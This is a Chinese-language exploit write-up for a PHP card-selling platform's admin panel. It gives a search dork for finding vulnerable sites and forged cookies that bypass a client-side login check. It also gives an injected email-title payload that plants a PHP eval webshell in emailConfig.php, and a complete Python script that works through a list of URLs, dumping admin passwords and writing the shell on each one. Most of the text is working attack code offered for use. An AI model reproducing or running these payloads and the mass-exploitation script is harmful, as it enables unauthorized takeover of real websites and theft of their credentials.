漏洞搜索
1 | inurl:admin/set.php |
漏洞原因
- admin后台文件校验cookie,可直接查看密码
- 后台设置有任意文件写入漏洞
漏洞代码
/admin/set.php
验证漏洞代码
1 | if($.cookie("user") == null || $.cookie("user") == "" || $.cookie("loginInfo") != $.md5($.cookie("pass"))){ |
2 | window.location.href='./login.php'; |
3 | }else{ |
4 | |
5 | } |
任意文件写入代码
1 | elseif($_GET['mod']=="sfEmail"){ |
2 | if($_POST['host'] == "" || $_POST['port'] == "" || $_POST['user'] == "" || $_POST['from'] == ""){ |
3 | showmsg("重要信息不能为空!"); |
4 | exit(); |
5 | } |
6 | $text="<?php |
7 | \$emailConfig = array( |
8 | 'host'=>'".$_POST['host']."',//邮箱的服务器地址 |
9 | 'fromName'=>'".$_POST['fromName']."',//设置发件人姓名(昵称) 任意内容 |
10 | 'port'=>'".$_POST['port']."',//端口 |
11 | 'user'=>'".$_POST['user']."',//邮箱账号 |
12 | 'pwd'=>'".$_POST['pwd']."',//邮箱密码 |
13 | 'from'=>'".$_POST['from']."',//设置发件人邮箱地址 这里填入上述提到的“发件人邮箱” |
14 | 'title'=>'".$_POST['title']."'//添加该邮件的主题 |
15 | ); |
16 | ?> |
17 | "; |
18 | saveFile("../emailConfig.php",$text); |
19 | showmsg("ok!",1); |
20 | } |
漏洞利用
添加cookies:
1
COOKIES = {
2
"user": "admin",
3
"pass": "admin",
4
"loginInfo": "21232f297a57a5a743894a0e4a801fc3"
5
}
访问
http://domain/admin/set.php?mod=admin
看到管理员密码进入 系统设置->发件邮箱设置->邮件标题
1
a');$x=&$y; $y=$_POST['cmd']; function a() { global $x; return $x; } eval(a());?>/*
之后蚁剑连接
http://domain/emailConfig.php
密码cmd
漏洞EXP【py】
1 | # encode=utf-8 |
2 | |
3 | |
4 | # search inurl:admin.php |
5 | import requests |
6 | import re |
7 | import pyfiglet |
8 | |
9 | |
10 | COOKIES = { |
11 | "user": "admin", |
12 | "pass": "admin", |
13 | "loginInfo": "21232f297a57a5a743894a0e4a801fc3" |
14 | } |
15 | |
16 | |
17 | def geturls(): |
18 | with open("url.list") as f: |
19 | urls = f.readlines() |
20 | return urls |
21 | |
22 | |
23 | def check(url): |
24 | # url = "http://debug.com" |
25 | purl = url.strip() + "/admin/set.php?mod=admin" |
26 | res = requests.post(purl, cookies=COOKIES) |
27 | if res.status_code == 200: |
28 | print("[+]Getting password") |
29 | print(res.text) |
30 | # getpass(res.text) |
31 | else: |
32 | exit("Got password failed") |
33 | |
34 | |
35 | def getpass(text): |
36 | user = re.search(r'', text) |
37 | pwd = re.search(r'管理员密码{30,50}', text) |
38 | if user is not None and pwd is not None: |
39 | print(user + " : " + pwd) |
40 | else: |
41 | exit("[-]Cant't find pass!") |
42 | |
43 | |
44 | def banner(): |
45 | pyfiglet.print_figlet("f a k a p a s s", colors="GREEN") |
46 | |
47 | |
48 | def write_shell(url): |
49 | purl = url + "/admin/set.php?mod=sfEmail" |
50 | data = { |
51 | "host": "smtp.163.com", |
52 | "fromName": "个人发卡平台", |
53 | "port": "25", |
54 | "user": "706672193", |
55 | "pwd": "706672193", |
56 | "from": "706672193@qq.com", |
57 | "title": "a');$x=&$y; $y=$_POST['cmd']; function a() { global $x; return $x; } eval(a());?>/*", |
58 | "submit": "修改" |
59 | } |
60 | res = requests.post(purl, data=data, cookies=COOKIES) |
61 | if res.status_code == 200: |
62 | print("[+]Write shell successfully!") |
63 | else: |
64 | print("[-]Write shell failed!") |
65 | exit("exited") |
66 | res = requests.get(url+"/emailConfig.php") |
67 | if res.status_code == 200: |
68 | print("[+]Shell path : "+url+"/emailConfig.php") |
69 | print("[+]Shell password : cmd") |
70 | else: |
71 | print("[-]Shell path is changed !") |
72 | |
73 | |
74 | def mainf(isw=0): |
75 | banner() |
76 | urls = geturls() |
77 | for url in urls: |
78 | if url[0] == "#": |
79 | continue |
80 | if "http://" != url[0:7] and "https://" != url[0:8]: |
81 | url = "http://" + url |
82 | print("URL:" + url) |
83 | check(url) |
84 | if isw != 0: |
85 | write_shell(url) |
86 | |
87 | |
88 | if __name__ == "__main__": |
89 | mainf(1) |
url写在另一个同目录文件url.list中
注
有的漏洞已经修复